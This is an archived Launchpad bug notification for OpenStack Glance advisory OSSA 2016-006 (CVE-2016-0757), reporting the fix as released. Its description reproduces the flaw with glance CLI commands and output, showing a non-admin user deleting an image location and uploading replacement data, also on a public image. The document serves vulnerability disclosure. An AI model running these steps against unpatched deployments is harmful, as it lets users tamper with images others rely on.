yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #50535
[Bug 1525915] Re: [OSSA 2016-006] Normal user can change image status if show_multiple_locations has been set to true (CVE-2016-0757)
** Changed in: glance/kilo
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if
show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Released
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
User (non admin) can set image back to queued state by deleting
location(s) from image when "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise glance has similar way as
described in OSSA 2015-019 as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T09:58:54Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:43:41Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This works also on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:11Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:43Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions
